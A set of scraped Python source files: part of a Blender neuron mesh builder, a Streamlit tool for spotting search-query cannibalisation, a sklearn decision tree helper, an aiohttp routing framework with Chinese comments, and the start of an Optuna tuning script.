bpy.context.object.data.texspace_size[2] = 5\n\n # Skip the soma, if the soma is disconnected\n if 'soma' in object_mesh.name:\n continue\n\n # Show the progress\n nmv.utilities.show_progress(\n '\\t * Decimating the mesh', float(i), float(len(neuron_meshes)))\n\n # Decimate each mesh object\n nmv.mesh.ops.decimate_mesh_object(\n mesh_object=object_mesh, decimation_ratio=self.options.mesh.tessellation_level)\n\n ################################################################################################\n # @reconstruct_soma_mesh\n ################################################################################################\n def reconstruct_soma_mesh(self):\n \"\"\"Reconstruct the mesh of the soma.\n\n NOTE: To improve the performance of the soft body physics simulation, reconstruct the\n soma profile before the arbors, such that the scene is almost empty.\n\n NOTE: If the soma is requested to be connected to the initial segments of the arbors,\n we must use a high number of subdivisions to make smooth connections that look nice,\n but if the arbors are connected to the soma origin, then we can use fewer subdivisions\n since the soma will not be connected to the arbor at all.\n \"\"\"\n\n # If the soma is connected to the root arbors\n if self.options.mesh.soma_connection == nmv.enums.Meshing.SomaConnection.CONNECTED:\n soma_builder_object = nmv.builders.SomaBuilder(\n morphology=self.morphology, options=self.options)\n\n # Otherwise, ignore\n else:\n soma_builder_object = nmv.builders.SomaBuilder(\n morphology=self.morphology,\n options=self.options)\n\n # Reconstruct the soma mesh\n self.reconstructed_soma_mesh = soma_builder_object.reconstruct_soma_mesh(apply_shader=False)\n\n # Apply the shader to the reconstructed soma mesh\n nmv.shading.set_material_to_object(self.reconstructed_soma_mesh, self.soma_materials[0])\n\n def add_spines(self):\n\n # Add spines\n spines_objects = None\n if self.options.mesh.spines == nmv.enums.Meshing.Spines.Source.CIRCUIT:\n nmv.logger.header('Adding circuit spines')\n spines_objects = nmv.builders.build_circuit_spines(\n morphology=self.morphology, blue_config=self.options.morphology.blue_config,\n gid=self.options.morphology.gid, 
material=self.spines_colors[0])\n\n # Random spines\n elif self.options.mesh.spines == nmv.enums.Meshing.Spines.Source.RANDOM:\n nmv.logger.header('Adding random spines')\n spines_builder = nmv.builders.RandomSpineBuilder(\n morphology=self.morphology, options=self.options)\n spines_objects = spines_builder.add_spines_to_morphology()\n\n # Otherwise ignore spines\n else:\n return\n\n # Join the spine objects into a single mesh\n spine_mesh_name = '%s_spines' % self.options.morphology.label\n self.spines_mesh = nmv.mesh.join_mesh_objects(spines_objects, spine_mesh_name)\n\n ################################################################################################\n # @initialize_meta_object\n ################################################################################################\n def initialize_meta_object(self,\n name):\n \"\"\"Constructs and initialize a new meta object that will be the basis of the mesh.\n\n :param name:\n Meta-object name.\n :return:\n A reference to the meta object\n \"\"\"\n\n # Create a new meta skeleton that will be used to reconstruct the skeleton frame\n self.meta_skeleton = bpy.data.metaballs.new(name)\n\n # Create a new meta object that reflects the reconstructed mesh at the end of the operation\n self.meta_mesh = bpy.data.objects.new(name, self.meta_skeleton)\n\n # Get a reference to the scene\n scene = bpy.context.scene\n\n # Link the meta object to the scene\n scene.objects.link(self.meta_mesh)\n\n # Update the resolution of the meta skeleton\n # TODO: Get these parameters from the user interface\n self.meta_skeleton.resolution = 1.0\n\n ################################################################################################\n # @emanate_soma_towards_arbor\n ################################################################################################\n def emanate_soma_towards_arbor(self,\n arbor):\n \"\"\"Extends the space of the soma towards the given arbor to make a shape that is not sphere.\n\n :param arbor:\n A given arbor to emanate the soma towards.\n \"\"\"\n\n # Assume that from the soma center towards the first point along the arbor is a segment\n self.create_meta_segment(\n p1=self.morphology.soma.centroid,\n p2=arbor.samples[0].point,\n r1=self.morphology.soma.mean_radius,\n r2=arbor.samples[0].radius * self.magic_scale_factor)\n\n ################################################################################################\n # @build_soma_from_meta_objects\n ################################################################################################\n def build_soma_from_meta_objects(self):\n\n # Header\n nmv.logger.header('Building Soma from Meta Objects')\n\n # Emanate towards the apical dendrite, if exists\n if not self.options.morphology.ignore_apical_dendrite:\n nmv.logger.info('Apical dendrite')\n\n # The apical dendrite must be valid\n if self.morphology.apical_dendrite is not None:\n self.emanate_soma_towards_arbor(arbor=self.morphology.apical_dendrite)\n\n # Emanate towards basal dendrites\n if not self.options.morphology.ignore_basal_dendrites:\n\n # Do it dendrite by dendrite\n for i, basal_dendrite in enumerate(self.morphology.dendrites):\n\n # Basal dendrites\n nmv.logger.info('Dendrite [%d]' % i)\n self.emanate_soma_towards_arbor(arbor=basal_dendrite)\n\n # Emanate towards the axon, if exists\n if not self.options.morphology.ignore_apical_dendrite:\n nmv.logger.info('Axon')\n\n # The axon must be valid\n if self.morphology.axon is not None:\n 
self.emanate_soma_towards_arbor(arbor=self.morphology.axon)\n\n ################################################################################################\n # @finalize_meta_object\n ################################################################################################\n def finalize_meta_object(self):\n \"\"\"Converts the meta object to a mesh and get it ready for export or visualization.\n\n :return:\n \"\"\"\n\n # Header\n nmv.logger.header('Meshing the Meta Object')\n\n # Deselect all objects\n nmv.scene.ops.deselect_all()\n\n # Select the mesh\n self.meta_mesh = bpy.context.scene.objects[self.morphology.label]\n self.meta_mesh.select = True\n bpy.context.scene.objects.active = self.meta_mesh\n\n # Convert it to a mesh from meta-balls\n bpy.ops.object.convert(target='MESH')\n\n self.meta_mesh = bpy.context.scene.objects[self.morphology.label + '.001']\n self.meta_mesh.name = self.morphology.label\n\n # Re-select it again to be able to perform post-processing operations in it\n self.meta_mesh.select = True\n\n bpy.context.scene.objects.active = self.meta_mesh\n\n ################################################################################################\n # @assign_material_to_mesh\n ################################################################################################\n def assign_material_to_mesh(self):\n\n # Deselect all objects\n nmv.scene.ops.deselect_all()\n\n # Activate the mesh object\n bpy.context.scene.objects.active = self.meta_mesh\n\n # Adjusting the texture space, before assigning the material\n bpy.context.object.data.use_auto_texspace = False\n bpy.context.object.data.texspace_size[0] = 5\n bpy.context.object.data.texspace_size[1] = 5\n bpy.context.object.data.texspace_size[2] = 5\n\n # Assign the material to the selected mesh\n nmv.shading.set_material_to_object(self.meta_mesh, self.soma_materials[0])\n\n # Activate the mesh object\n self.meta_mesh.select = True\n bpy.context.scene.objects.active = self.meta_mesh\n\n ################################################################################################\n # @transform_to_global_coordinates\n ################################################################################################\n def transform_to_global_coordinates(self):\n \"\"\"Transform the neuron membrane to the global coordinates.\n\n NOTE: Spine transformation is already implemented by the spine builder, and therefore\n this function applies only to the arbors and the soma.\n \"\"\"\n\n # Transform the neuron object to the global coordinates\n nmv.logger.header('Transforming to global coordinates')\n nmv.skeleton.ops.transform_to_global_coordinates(\n mesh_object=self.meta_mesh, blue_config=self.options.morphology.blue_config,\n gid=self.options.morphology.gid)\n\n ################################################################################################\n # @reconstruct_mesh\n ################################################################################################\n def reconstruct_mesh(self):\n \"\"\"Reconstructs the neuronal mesh using meta objects.\n \"\"\"\n\n # Verify and repair the morphology\n # self.verify_and_repair_morphology()\n\n # Initialize the meta object\n self.initialize_meta_object(name=self.options.morphology.label)\n\n # Build the soma\n self.build_soma_from_meta_objects()\n\n # Build the arbors\n self.build_arbors()\n\n # Finalize the meta object and construct a solid object\n # self.finalize_meta_object()\n\n # We can here create the materials at the end to avoid any issues\n 
self.create_skeleton_materials()\n\n # Assign the material to the mesh\n self.assign_material_to_mesh()\n\n # Transform the mesh to the global coordinates\n if self.options.mesh.global_coordinates:\n self.transform_to_global_coordinates()\n\n # Mission done\n nmv.logger.header('Done!')\n\n # Return a reference to the created mesh\n return self.meta_mesh\n\n\n\n # Adding surface roughness\n # self.add_surface_noise()\n\n # Decimation\n self.decimate_neuron_mesh()\n\n\n #\n # Compile a list of all the meshes in the scene, they account for the different mesh\n # objects of the neuron\n for scene_object in bpy.context.scene.objects:\n if scene_object.type == 'MESH':\n\n # Add the object to the list\n self.reconstructed_neuron_meshes.append(scene_object)\n\n # If the meshes are merged into a single object, we must override the texture values\n # Update the texture space of the created mesh\n scene_object.select = True\n bpy.context.scene.objects.active = scene_object\n bpy.context.object.data.use_auto_texspace = False\n bpy.context.object.data.texspace_size[0] = 5\n bpy.context.object.data.texspace_size[1] = 5\n bpy.context.object.data.texspace_size[2] = 5\n scene_object.select = False\n\n # Connecting all the mesh objects together in a single object\n if self.options.mesh.neuron_objects_connection == \\\n nmv.enums.Meshing.ObjectsConnection.CONNECTED:\n\n nmv.logger.header('Connecting neurons objects')\n nmv.logger.info('Connecting neuron: [%s_mesh]' % self.options.morphology.label)\n\n # Group all the objects into a single mesh object after the decimation\n neuron_mesh = nmv.mesh.ops.join_mesh_objects(\n mesh_list=self.reconstructed_neuron_meshes,\n name='%s_mesh' % self.options.morphology.label)\n\n # Update the reconstructed_neuron_meshes list to a single object\n self.reconstructed_neuron_meshes = [neuron_mesh]\n\n # Transform the neuron object to the global coordinates\n if self.options.mesh.global_coordinates:\n nmv.logger.header('Transforming to global coordinates')\n\n for mesh_object in self.reconstructed_neuron_meshes:\n nmv.skeleton. ops.transform_to_global(\n neuron_object=mesh_object,\n blue_config=self.options.morphology.blue_config,\n gid=self.options.morphology.gid)\n\n\n\n return self.reconstructed_neuron_meshes","repo_name":"lkoelman/dbs-neuromorphovis","sub_path":"neuromorphovis/builders/mesh/meta_builder.py","file_name":"meta_builder.py","file_ext":"py","file_size_in_byte":30074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23051797275","text":"import pandas as pd\nimport streamlit as st\n\n#create page configurations to provide a Meta Title and main header\nst.set_page_config(page_title=\"Cannibalisation Data Review\", initial_sidebar_state=\"auto\")\nst.title('Cannibalisation Tool')\n\n# read the csv file and create the dataframe\n# update df = pd.read_csv('your_file.csv') to:\nuploaded_file = st.file_uploader(\"Use a GSC API export that includes query and page as the dimensions, exporting clicks, impressions, avg. 
position and CTR\", type='csv')\n\n#update to include slider so you can customise your cannibalisation threshold\nimpression_th = st.slider(\"Input what impression share threshold is required to be marked as potential cannibalisation\", min_value=0.0, max_value=1.0, value=0.1) \nclick_th = st.slider(\"Input what click share threshold is required to be marked as potential cannibalisation\", min_value=0.0, max_value=1.0, value=0.1)\n\n#update to add \"uploaded_file\"\nif uploaded_file is not None:\n\n @st.cache\n def create_df(file):\n\n df = pd.read_csv(uploaded_file)\n # group the data by the query column and calculate the total impressions and total clicks for each query\n df_impressions = df.groupby('query')['impressions'].transform('sum')\n df_clicks = df.groupby('query')['clicks'].transform('sum')\n\n # create new columns in the original dataframe with the total impressions and total clicks for each query\n df['total_impressions'] = df_impressions\n df['total_clicks'] = df_clicks\n\n # create a new column that calculates the impressions share for each page for each query\n df['impressions_share'] = df['impressions'] / df['total_impressions'].fillna(0)\n\n # create a new column that calculates the clicks share for each page for each query\n df['clicks_share'] = df['clicks'] / df['total_clicks'].fillna(0)\n\n #had to rerun this again to get the right approach\n df['more_than_one_page_over_impr_cann_threshold'] = df.groupby('query')['impressions_share'].transform(lambda x: (x >= impression_th).sum() > 1)\n\n # create a new column that shows if there are more than one pages with 10% or more clicks share\n df['more_than_one_page_over_clicks_cann_threshold'] = df.groupby('query')['clicks_share'].transform(lambda x: (x >= click_th).sum() > 1)\n\n filtered_df = df[(df['more_than_one_page_over_impr_cann_threshold'] == True) | (df['more_than_one_page_over_clicks_cann_threshold'] == True)]\n return filtered_df\n \n df = create_df(uploaded_file)\n #create your filters\n\n st.write(\"If you'd rather just export the data in full and use another tool to find what you need, you can export the full data table below, otherwise scroll further to filter your dataset.\")\n csv_1 = df.to_csv(index=False)\n st.download_button('Download Full Data as CSV', csv_1, file_name = 'Full data - unfiltered.csv', mime='text/csv')\n\n st.header(\"Output table\")\n st.write(\"The table below is filtered to only queries with 2 or more pages with over 10% of either clicks or impressions. 
Now we have the output, we can start adding filters so we get exactly what we want\")\n\n    col1,col2 = st.columns(2)\n\n    with col1:\n        filter_tot_imp = st.select_slider('Filter by total query impressions', options=[0,1,10,50,100,200,300,400,500,1000,10000], value=0)\n    with col2:\n        filter_tot_cli = st.select_slider('Filter by total query clicks', options=[0,1,10,50,100,200,300,400,500,1000,10000], value=0)\n    \n    col3,col4 = st.columns(2)\n\n    with col3:\n        filter_imp_share = st.slider('Find out the biggest problems by filtering by impression share', min_value=0.0, max_value=1.0, value=0.0)\n    with col4:\n        filter_imp_click = st.slider('Find out the biggest problems by filtering by click share', min_value=0.0, max_value=1.0, value=0.0)\n\n    # print the new dataframe\n\n    filtered_df = df[(df['total_impressions'] >= filter_tot_imp) & (df['total_clicks'] >= filter_tot_cli) & (df['impressions_share'] >= filter_imp_share) & (df['clicks_share'] >= filter_imp_click)]\n    st.write(\"There are \", len(filtered_df.index), \" rows in this current filtered dataframe and \", filtered_df['query'].unique().size, \" unique queries.\")\n    st.dataframe(filtered_df)\n    csv = filtered_df.to_csv(index = False)\n    st.download_button('Download Table as CSV', csv, file_name = 'output.csv', mime='text/csv')\n","repo_name":"pluswillseo/cannibalisation_review","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3133151429","text":"from sklearn import tree\nfrom sklearn.tree import DecisionTreeClassifier\nclass DecisionTree(object):\n    def getDtree(self, features, y=None):\n        if y is None:\n            y=self.target\n        df = self.df\n        X = df[features]\n        dtree = DecisionTreeClassifier()\n        dtree = dtree.fit(X, df[y])\n        return dtree\n    def createDecisionTreeData(self, features, y):\n        dtree = self.getDtree(features, y)\n        self.graphData = tree.export_graphviz(\n            dtree, out_file=None, feature_names=features\n        )\n        return self","repo_name":"qcgm1978/py-test","sub_path":"test/machine_learning/graphic/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"877841981","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nA web framework built on top of aiohttp that further simplifies web development.\naiohttp is fairly low-level; to write less code when using it as a framework, the only option is to wrap a higher-level framework around aiohttp.\nThe framework is designed entirely from the user's perspective: the goal is to let the framework user write as little code as possible.\n\"\"\"\n__author__ = 'Hk4Fun'\n\nimport asyncio\n# used to manipulate file/module paths\nimport os\n# used to inspect a function's parameter information\nimport inspect\nimport logging\n# used to preserve the attributes of a decorated function, e.g. __name__\nimport functools\n# used to parse the query string of a URL\nfrom urllib import parse\nfrom aiohttp import web\n# our own module, used to detect API call errors; it can be ignored for now\nfrom apis import APIError\n\n\n# This is a decorator, referenced in the handlers module; it attaches two attributes to a handler: the HTTP request method and the request path\n# It is a three-level nested decorator so that the decorator itself can take an argument\n# This decorator maps a function to a URL handler function\ndef get(path):\n    def decorator(func): # the argument is a function\n        # Python's built-in functools.wraps decorator restores the decorated function's __name__ attribute to the original one, i.e. func's\n        # because without this decorator the function's __name__ would be 'wrapper' rather than 'func'\n        @functools.wraps(func)\n        def wrapper(*args, **kw):\n            return func(*args, **kw)\n        wrapper.__method__ = 'GET' # attach the request method 'GET' to the original function\n        wrapper.__route__ = path # attach the request path 'path' to the original function\n        return wrapper\n    return decorator\n# This way, a function decorated with @get(path) carries its URL information\n\n# same as get(path)\ndef post(path):\n    def decorator(func):\n        @functools.wraps(func)\n        def wrapper(*args, **kw):\n            return func(*args, **kw)\n        wrapper.__method__ = 'POST'\n        wrapper.__route__ = path\n        return wrapper\n    return decorator
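\n\n# A quick illustration of how these decorators are meant to be used; the handler\n# below is a hypothetical example, not part of this project. After decoration the\n# function simply carries the metadata that add_route() reads later:\n#\n#     @get('/blog/{id}')\n#     async def get_blog(id):\n#         ...\n#\n#     get_blog.__method__   # -> 'GET'\n#     get_blog.__route__    # -> '/blog/{id}'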
\n\n\n# inspect.Parameter has 5 possible 'kind' values:\n# POSITIONAL_ONLY\t\ta positional-only parameter\n# POSITIONAL_OR_KEYWORD\tmay be passed positionally or as a keyword\n# VAR_POSITIONAL\t\tequivalent to *args\n# KEYWORD_ONLY\t\t\tequivalent to *, key\n# VAR_KEYWORD\t\t\tequivalent to **kw\n# For details see: http://blog.csdn.net/weixin_35955795/article/details/53053762\n# The argument fn is itself a function; the five functions below inspect and classify fn's parameters\n\n\n# This function returns a tuple of fn's KEYWORD_ONLY parameters that have no default value\ndef get_required_kw_args(fn):\n    args = [] # an empty list used to store the names of fn's qualifying parameters\n    params = inspect.signature(fn).parameters # returns a key-value mapping of the function's parameters\n    for name, param in params.items():\n        # the parameter kind is KEYWORD_ONLY and no default is given; inspect.Parameter.empty means the default value is empty\n        if param.kind == inspect.Parameter.KEYWORD_ONLY and param.default == inspect.Parameter.empty:\n            args.append(name) # only the parameter name is appended\n    return tuple(args)\n\n# Basically the same as the previous function; the only difference is that the no-default condition is dropped, i.e. this function extracts the names of all of fn's KEYWORD_ONLY parameters\ndef get_named_kw_args(fn):\n    args = []\n    params = inspect.signature(fn).parameters\n    for name, param in params.items():\n        if param.kind == inspect.Parameter.KEYWORD_ONLY:\n            args.append(name)\n    return tuple(args)\n\n# checks whether fn has any KEYWORD_ONLY parameter\ndef has_named_kw_args(fn):\n    params = inspect.signature(fn).parameters\n    for name, param in params.items():\n        if param.kind == inspect.Parameter.KEYWORD_ONLY:\n            return True\n\n# checks whether fn has **kw (a variadic keyword parameter)\ndef has_var_kw_arg(fn):\n    params = inspect.signature(fn).parameters\n    for name, param in params.items():\n        if param.kind == inspect.Parameter.VAR_KEYWORD:\n            return True\n\n\n# Checks whether there is a parameter named 'request' and that it comes after the other ordinary positional parameters,\n# i.e. fn(POSITIONAL_ONLY, request, VAR_POSITIONAL, KEYWORD_ONLY, VAR_KEYWORD)\n# Of course, 'request' itself may be one of VAR_POSITIONAL, KEYWORD_ONLY or VAR_KEYWORD here\ndef has_request_arg(fn):\n    sig = inspect.signature(fn) # split into two lines because the raise statement below needs sig\n    params = sig.parameters\n    found = False # not found by default\n    for name, param in params.items():\n        if name == 'request':\n            found = True\n            continue # why not break? because we must keep checking the remaining parameters to make sure request is the last positional parameter\n            # or one of VAR_POSITIONAL, KEYWORD_ONLY, VAR_KEYWORD\n        if found and (param.kind != inspect.Parameter.VAR_POSITIONAL\n                      and param.kind != inspect.Parameter.KEYWORD_ONLY\n                      and param.kind != inspect.Parameter.VAR_KEYWORD):\n            raise ValueError('request parameter must be the last named parameter in function: %s%s'\n                             % (fn.__name__, str(sig)))\n    return found
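\n\n# A worked example for the five helpers above (the handler f is hypothetical,\n# assumed here purely for illustration):\n#\n#     async def f(request, *, q, page=1):\n#         ...\n#\n#     get_required_kw_args(f)   # -> ('q',), since q has no default\n#     get_named_kw_args(f)      # -> ('q', 'page')\n#     has_named_kw_args(f)      # -> True\n#     has_var_kw_arg(f)         # -> None (falsy), f has no **kw\n#     has_request_arg(f)        # -> True, and no ValueError is raised because\n#                               #    only KEYWORD_ONLY parameters follow 'request'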
\n\n\n# The purpose of RequestHandler is to analyse which parameters the URL handler function expects,\n# then extract the necessary arguments from the request, build a dict, and call the URL function with it as **kw\n\nclass RequestHandler(object):\n    # initialise its own attributes, extracting the necessary parameter information from fn\n    def __init__(self, app, fn):\n        self._app = app\n        self._func = fn\n        self._has_request_arg = has_request_arg(fn)\n        self._has_var_kw_arg = has_var_kw_arg(fn)\n        self._has_named_kw_args = has_named_kw_args(fn)\n        self._named_kw_args = get_named_kw_args(fn)\n        self._required_kw_args = get_required_kw_args(fn)\n\n    # once __call__ is defined, an instance of this class behaves like a function and can be called directly\n    # why do this? because app.router.add_route() below expects a callback function\n    # we could have passed the functions from handlers straight in\n    # but to make development easier (and build the framework) we wrap that function in several layers\n    # this also lets framework users simply add business-logic functions (handlers) to handlers without touching any other module -- full transparency\n\n    # the logic of __call__:\n    # 1. define the kw object used to store the arguments\n    # 2. check whether the request object carries qualifying parameters; if so, store them into kw depending on whether the method is POST or GET\n    # 3. if kw is empty (the request passed no parameters), assign the resource mapping from match_info (expressed by the url path in the decorator argument) to kw;\n    #    otherwise keep the named keyword arguments in kw\n    # 4. round things off with the _has_request_arg and _required_kw_args attributes\n\n    # app.router.add_route() passes the request argument into this function when it invokes the callback\n    async def __call__(self, request):\n        kw = None\n        # if fn has (**kw) or (KEYWORD_ONLY) parameters\n        # it means fn expects arguments whose values come from the data submitted with the request\n        # POSITIONAL_OR_KEYWORD and VAR_POSITIONAL are not considered here,\n        # since VAR_POSITIONAL is never used, and apart from match_info and request all parameters of the url functions in handlers must be KEYWORD_ONLY\n        if self._has_var_kw_arg or self._has_named_kw_args:\n            # parse and extract the data submitted with the request, per POST/GET method\n            # handling for method == POST\n            if request.method == 'POST':\n                # the type of a POST request is obtained via content_type, see: http://www.cnblogs.com/aaronjs/p/4165049.html\n                if not request.content_type: # check that Content-Type exists; without it the submitted data cannot be parsed by type\n                    return web.HTTPBadRequest('Missing Content-Type!')\n                ct = request.content_type.lower() # lowercase everything to make the checks easier\n                if ct.startswith('application/json'): # startswith is used instead of direct comparison because a charset=utf-8 may follow, which we do not care about\n                    params = await request.json() # for the json data format, read the json payload with json()\n                    if not isinstance(params, dict): # after deserialisation this should be a dict, otherwise the submitted json itself is malformed\n                        return web.HTTPBadRequest('JSON body must be object!')\n                    kw = params # if all is well, hand the request's parameters to kw (already deserialised into a dict)\n                elif ct.startswith('application/x-www-form-urlencoded') or ct.startswith('multipart/form-data'): # the traditional browser form formats\n                    params = await request.post() # browser form data is read with the post method\n                    kw = dict(**params) # convert the form data into a dict and hand it to kw\n                else: # the submitted type is neither a json object nor a browser form, so we can only report an unsupported body type -- in effect, no xml support\n                    return web.HTTPBadRequest('Unsupported Content-Type: %s' % request.content_type)
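\n            # For instance (hypothetical request): a client POSTing the body '{\"name\": \"Tom\"}'\n            # with 'Content-Type: application/json' reaches this point with kw == {'name': 'Tom'},\n            # while the same field submitted as a classic browser form is read via request.post() instead.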
\n            # handling for method == GET\n            if request.method == 'GET': # the GET method is simpler: query parameters are appended to the url to request a resource on the server\n                # request.query_string is the query string part of the url\n                # e.g. searching Baidu for ReedSun gives the url https://www.baidu.com/s?ie=UTF-8&wd=ReedSun\n                # where 'ie=UTF-8&wd=ReedSun' is the query string\n                qs = request.query_string\n                if qs: # if a query string exists\n                    kw = dict()\n                    # parse.parse_qs(qs, keep_blank_values=False, strict_parsing=False) parses a given query string\n                    # keep_blank_values defaults to False and controls whether blank values are ignored: True keeps them, False drops them\n                    # strict_parsing: if True, errors raise a ValueError; if False, errors are ignored\n                    # the function returns a dict whose keys are the strings before the equals sign and whose values are the strings after it, wrapped in lists\n                    # e.g. the example above returns {'ie': ['UTF-8'], 'wd': ['ReedSun']}\n                    for k, v in parse.parse_qs(qs, True).items():\n                        kw[k] = v[0]\n        # if kw is still empty after the above, no data was obtained from the Request or fn has no matching parameter kinds,\n        # so assign the resource mapping from match_info (expressed by the url path in the decorator argument) to kw\n        if kw is None:\n            # Resource may have variable path also. For instance, a resource\n            # with the path '/a/{name}/c' would match all incoming requests\n            # with paths such as '/a/b/c', '/a/1/c', and '/a/etc/c'.\n            # A variable part is specified in the form {identifier}, where the\n            # identifier can be used later in a request handler to access the\n            # matched value for that part. This is done by looking up the\n            # identifier in the Request.match_info mapping:\n            kw = dict(**request.match_info)\n        # when kw is not empty, process kw further\n        else:\n            # when fn has no **kw but does have KEYWORD_ONLY parameters, keep only the KEYWORD_ONLY arguments in kw and drop the rest, otherwise too many arguments get passed\n            if (not self._has_var_kw_arg) and self._has_named_kw_args:\n                copy = dict()\n                for name in self._named_kw_args: # iterate over each of fn's KEYWORD_ONLY parameters\n                    if name in kw: # if this parameter also appears in kw, copy it into copy\n                        copy[name] = kw[name]\n                kw = copy # overwrite kw with the filtered KEYWORD_ONLY arguments, so only those remain in kw\n            # then put the data from match_info into kw, checking for name clashes with what is already in kw; match_info wins here\n            for k, v in request.match_info.items():\n                if k in kw:\n                    logging.warning('Duplicate arg name in kw args (choose match_info\\'s): %s' % k)\n                kw[k] = v\n        # do not forget request: if there is a request parameter, add the request\n        # note that this means we may omit it when fn does not need request\n        # without this framework a url function would be forced to take a request parameter,\n        # since app.router.add_route() passes request to it unconditionally -- again showing how the framework shields and abstracts this away\n        if self._has_request_arg:\n            kw['request'] = request\n        # a KEYWORD_ONLY parameter without a default must be given a value, otherwise it is an error\n        if self._required_kw_args:\n            for name in self._required_kw_args:\n                if name not in kw:\n                    return web.HTTPBadRequest('Missing argument: %s' % name)\n        logging.info('call with args: %s' % str(kw)) # log the arguments finally passed to fn\n        try:\n            return (await self._func(**kw))\n        except APIError as e: # catch any API error encountered and return it to the user\n            return dict(error=e.error, data=e.data, message=e.message)\n\n\n# add the static file path to the app\ndef add_static(app):\n    # os.path.abspath(__file__) returns the absolute path of the current script (including the file name)\n    # os.path.dirname() strips the file name and returns the directory path\n    # os.path.join() joins the separate parts into a single path\n    # so the following adds the 'static' directory next to this file to the app's router\n    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'static')\n    app.router.add_static('/static/', path)\n    logging.info('add static %s => %s' % ('/static/', path))
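\n\n# For example (illustrative path, not taken from the project): if this file lives\n# at /srv/webapp/www/webframe.py, add_static() maps the URL prefix '/static/' to\n# the directory /srv/webapp/www/static.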
\n\n# register a URL handler function\ndef add_route(app, fn):\n    # fetch the '__method__' and '__route__' attributes; raise if either is missing\n    method = getattr(fn, '__method__', None)\n    path = getattr(fn, '__route__', None)\n    if path is None or method is None:\n        raise ValueError('@get or @post not defined in %s.' % str(fn))\n    # check whether fn is a coroutine (i.e. decorated with @asyncio.coroutine) and whether it is a generator function\n    if not asyncio.iscoroutine(fn) and not inspect.isgeneratorfunction(fn):\n        fn = asyncio.coroutine(fn) # if it is neither, convert it into a coroutine\n    logging.info('add route : method = %s, path = %s, fn = %s (%s)' % (\n        method, path, fn.__name__, ', '.join(inspect.signature(fn).parameters.keys())))\n    # register it as the url handler (callback) for this method and path; the callback is RequestHandler's introspective '__call__'\n    app.router.add_route(method, path, RequestHandler(app, fn))\n\n\ndef add_routes(app, module_name):\n    # automatically search the module named module_name for url handler functions\n    # check whether the given module_name contains a '.'\n    # Python rfind() returns the index of the last occurrence of '.' in the string (searching from the right), or -1 if there is no match\n    n = module_name.rfind('.')\n    # no '.', so the module is in the current directory; import it directly\n    if n == (-1):\n        # __import__ works like import, except that import binds another module into the current module while __import__ returns an object\n        # __import__(name, globals=None, locals=None, fromlist=(), level=0)\n        # name -- the module name\n        # globals, locals -- determine how to interpret the name in package context\n        # fromlist -- a list of names of submodules or objects of the module given by name\n        # level -- absolute vs. relative import; the default 0 means absolute import, a positive value gives the number of parent directories to go up for a relative import\n        mod = __import__(module_name, globals(), locals())\n        logging.info('globals = %s', globals()['__name__'])\n    else:\n        name = module_name[n+1:] # take the submodule name\n        # the statement below first imports the module and its submodule with the __import__ expression,\n        # then fetches the submodule with getattr(), e.g. handlers.handler\n        mod = getattr(__import__(module_name[:n], globals(), locals(), [name]), name)\n    for attr in dir(mod): # iterate over mod's methods and attributes\n        if attr.startswith('_'): # skip anything starting with '_'; the handler functions we define do not start with '_'\n            continue\n        fn = getattr(mod, attr) # fetch the attribute or method not starting with '_'\n        if callable(fn): # if it is callable it is a method\n            # check the '__method__' and '__route__' attributes\n            method = getattr(fn, '__method__', None)\n            path = getattr(fn, '__route__', None)\n            if method and path: # if both exist, it is one of our url handler functions; register it in the app's routes\n                add_route(app, fn)\n","repo_name":"Hk4Fun/awesome-python3-webapp","sub_path":"www/webframe.py","file_name":"webframe.py","file_ext":"py","file_size_in_byte":16633,"program_lang":"python","lang":"zh","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"17793907048","text":"from functools import partial\n\nimport typer\nimport optuna\n\n\ndef set_trial(trial: optuna.Trial):\n    trial.suggest_categorical(\"rnn_type\", ['gru', 'lstm'])\n    trial.suggest_float(\"emb_dropout\", 0.0, 0.9)\n    trial.suggest_int(\"embedding_dim\", 8, 1024, log=True)\n    trial.suggest_categorical(\"bidirectional\", ['true', 'false'])\n    trial.suggest_float(\"lstm_dropout\", 0.0, 0.9)\n    trial.suggest_int(\"lstm_dim\", 8, 1024, log=True)\n    trial.suggest_int(\"num_examples_per_class\", 8, 512, log=True)\n    # trial.suggest_int(\"num_examples_per_class\", 8, 32, log=True)\n    trial.suggest_categorical(\"num_layers\", [1, 2, 3, 4, 5])\n    trial.suggest_categorical(\"num_highway_layers\", [1, 2, 3, 4, 5])\n    trial.suggest_categorical(\"hidden_dims_id\", [str(x) for x in list(range(1, 11))])\n    trial.suggest_float(\"features_dropout\", 0.0, 0.9)\n    trial.suggest_float(\"lr\", 0.00001, 0.1, log=True)\n    trial.suggest_categorical(\n        \"features_act\",\n        [\n            'linear',\n            'mish',\n            'swish',\n            'relu',\n            'relu6',\n            'elu',\n            'gelu',\n            'prelu',\n            'leaky_relu',\n            'hardtanh',\n            'sigmoid',\n            'tanh',\n            'log_sigmoid',\n            'softplus',\n            'softshrink',\n            'softsign',\n            'tanhshrink',\n            'selu'\n        ]\n    )\n\n\ndef fraud_objective(\n    trial: optuna.Trial,\n    config_path: str,\n    serialization_dir: str\n) -> float:\n    set_trial(trial)\n\n    executor = optuna.integration.allennlp.AllenNLPExecutor(\n        trial=trial,\n        config_file=config_path,\n        serialization_dir=f\"{serialization_dir}/{trial.number}\",\n        metrics=\"best_validation_roc_auc\",\n        include_package=\"fraud\",\n    )\n    return 
